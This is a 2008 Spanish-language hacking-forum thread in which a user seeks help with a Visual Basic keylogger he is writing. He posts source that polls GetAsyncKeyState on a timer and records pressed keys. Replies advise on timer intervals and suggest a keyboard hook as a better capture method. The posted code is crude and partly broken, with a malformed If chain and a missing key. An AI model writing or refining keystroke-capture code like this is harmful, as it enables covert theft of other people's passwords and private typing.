elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Problema con mi Keylogger
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Problema con mi Keylogger  (Leído 4,686 veces)
& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Problema con mi Keylogger
« en: 5 Octubre 2008, 19:49 pm »

Bueno, estoy programando mi keylogger y el timer que capta las pulsaciones no se a que intervalo ponerlo porque si escribes muy rapido no coje muy bien las teclas, tengo de intervalo 150.

¿Alguien sabe a cuanto ponerlo? Gracias.


En línea

aaronduran2


Desconectado Desconectado

Mensajes: 790



Ver Perfil WWW
Re: Problema con mi Keylogger
« Respuesta #1 en: 5 Octubre 2008, 19:54 pm »

El que había hecho yo en mis inicios lo puse a 1 milisegundo y funcionaba perfectamente.

Saludos.


En línea

& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: Problema con mi Keylogger
« Respuesta #2 en: 5 Octubre 2008, 20:00 pm »

Si lo pongo a 1, por ejemplo cuando pulsa una tecla = se repite la misma tecla 2 o 3 veces...
En línea

DarkMatrix

Desconectado Desconectado

Mensajes: 150


Nuestro Limite es la Imaginacion


Ver Perfil WWW
Re: Problema con mi Keylogger
« Respuesta #3 en: 5 Octubre 2008, 20:46 pm »

Pon el Interval en 90, a mi me funciono con ese intervalo de tiempo sin repetir las letras Saludos xD!
En línea

Todo aquello que no se puede hacer, es lo que no intentamos hacer.
Projecto Ani-Dimension Digital Duel Masters (Juego de cartas masivo multijugador online hecho en Visual Basic 6.0)

Desing by DarkMatrix
& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: Problema con mi Keylogger
« Respuesta #4 en: 5 Octubre 2008, 21:17 pm »

Sigue sin ir bien, hay veces que no pilla las telcas, las repite etc...
En línea

WestOn

Desconectado Desconectado

Mensajes: 272


El testamento Maya...


Ver Perfil
Re: Problema con mi Keylogger
« Respuesta #5 en: 5 Octubre 2008, 21:36 pm »

Si usas un teclado inalambrico quizas esq te faltan pilas y va mal :xD
Yo el q tengo esta en 50 y no me da errores ni na..

un saludo

PD:¿Y no sera el code en donde esta el error?
« Última modificación: 5 Octubre 2008, 21:41 pm por WestOn » En línea

En mi cabeza existe una barrera espacio-tiempo de 4cm³. ¿Alguien sabe como eliminarla?.
                                                                                                                                                                                                                            
& eDu &


Desconectado Desconectado

Mensajes: 580



Ver Perfil
Re: Problema con mi Keylogger
« Respuesta #6 en: 5 Octubre 2008, 21:51 pm »

Estoy en un portatil, mira el code

Código
  1. Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
  2. Dim cadena As String
  3.  
  4. Private Sub Timer1_Timer()
  5.    If GetAsyncKeyState(vbKeyA) <> 0 Then
  6.     cadena = cadena + "a"
  7.    If GetAsyncKeyState(vbKeyB) <> 0 Then
  8.     cadena = cadena + "b"
  9.     ElseIf GetAsyncKeyState(vbKeyC) <> 0 Then
  10.     cadena = cadena + "c"
  11.     ElseIf GetAsyncKeyState(vbKeyD) <> 0 Then
  12.     cadena = cadena + "d"
  13.     ElseIf GetAsyncKeyState(vbKeyE) <> 0 Then
  14.     cadena = cadena + "e"
  15.     ElseIf GetAsyncKeyState(vbKeyF) <> 0 Then
  16.     cadena = cadena + "f"
  17.     ElseIf GetAsyncKeyState(vbKeyG) <> 0 Then
  18.     cadena = cadena + "g"
  19.     ElseIf GetAsyncKeyState(vbKeyH) <> 0 Then
  20.     cadena = cadena + "h"
  21.     ElseIf GetAsyncKeyState(vbKeyI) <> 0 Then
  22.     cadena = cadena + "i"
  23.     ElseIf GetAsyncKeyState(vbKeyJ) <> 0 Then
  24.     cadena = cadena + "j"
  25.     ElseIf GetAsyncKeyState(vbKeyK) <> 0 Then
  26.     cadena = cadena + "k"
  27.     ElseIf GetAsyncKeyState(vbKeyL) <> 0 Then
  28.     cadena = cadena + "l"
  29.     ElseIf GetAsyncKeyState(vbKeyM) <> 0 Then
  30.     cadena = cadena + "m"
  31.     ElseIf GetAsyncKeyState(vbKeyN) <> 0 Then
  32.     cadena = cadena + "n"
  33.     ElseIf GetAsyncKeyState(vbKeyR) <> 0 Then
  34.     cadena = cadena + "r"
  35.     ElseIf GetAsyncKeyState(vbKeyO) <> 0 Then
  36.     cadena = cadena + "o"
  37.     ElseIf GetAsyncKeyState(vbKeyP) <> 0 Then
  38.     cadena = cadena + "p"
  39.     ElseIf GetAsyncKeyState(vbKeyQ) <> 0 Then
  40.     cadena = cadena + "q"
  41.     ElseIf GetAsyncKeyState(vbKeyS) <> 0 Then
  42.     cadena = cadena + "s"
  43.     ElseIf GetAsyncKeyState(vbKeyT) <> 0 Then
  44.     cadena = cadena + "t"
  45.     ElseIf GetAsyncKeyState(vbKeyU) <> 0 Then
  46.     cadena = cadena + "u"
  47.     ElseIf GetAsyncKeyState(vbKeyW) <> 0 Then
  48.     cadena = cadena + "w"
  49.   ElseIf GetAsyncKeyState(vbKeyX) <> 0 Then
  50.     cadena = cadena + "x"
  51.     ElseIf GetAsyncKeyState(vbKeyY) <> 0 Then
  52.     cadena = cadena + "y"
  53.     ElseIf GetAsyncKeyState(vbKeyZ) <> 0 Then
  54.     cadena = cadena + "z"
  55.     ElseIf GetAsyncKeyState(32) <> 0 Then
  56.     cadena = cadena + " "
  57.     ElseIf GetAsyncKeyState(13) <> 0 Then
  58.     cadena = cadena + vbNewLine
  59.     ElseIf GetAsyncKeyState(63) <> 0 Then
  60.     cadena = cadena + "?"
  61.     ElseIf GetAsyncKeyState(191) <> 0 Then
  62.     cadena = cadena + "¿"
  63.     End If
  64.     Text1.Text = cadena
  65. End Sub
En línea

WestOn

Desconectado Desconectado

Mensajes: 272


El testamento Maya...


Ver Perfil
Re: Problema con mi Keylogger
« Respuesta #7 en: 5 Octubre 2008, 21:59 pm »

 :-\
« Última modificación: 6 Octubre 2008, 21:38 pm por WestOn » En línea

En mi cabeza existe una barrera espacio-tiempo de 4cm³. ¿Alguien sabe como eliminarla?.
                                                                                                                                                                                                                            
seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: Problema con mi Keylogger
« Respuesta #8 en: 6 Octubre 2008, 03:28 am »

Hola, por favor nunca haria un keylogger con un intervlo de 1 milisegundo, te come en recursos el programa, se puede hacer sin timer usando un Hook...

saludos.
En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Problema con mi Keylogger
« Respuesta #9 en: 6 Octubre 2008, 19:02 pm »

Si has de usar el metodo del Timer, el cual no me gusta demasiado :-\... prueba a obtener la 'Velocidad de Repeticion' del teclado, que esta en 'Panel De Control'/'Teclado'

Saludos :D
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Exploit+keylogger problema con el puerto?
Bugs y Exploits
akibara 5 6,546 Último mensaje 21 Enero 2012, 04:53 am
por CloudswX
Problema Keylogger L
Programación Visual Basic
RiverPlate96 1 2,054 Último mensaje 13 Diciembre 2012, 17:33 pm
por Danyfirex
Problema con keylogger
Scripting
Panic0 0 2,057 Último mensaje 30 Agosto 2020, 04:12 am
por Panic0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines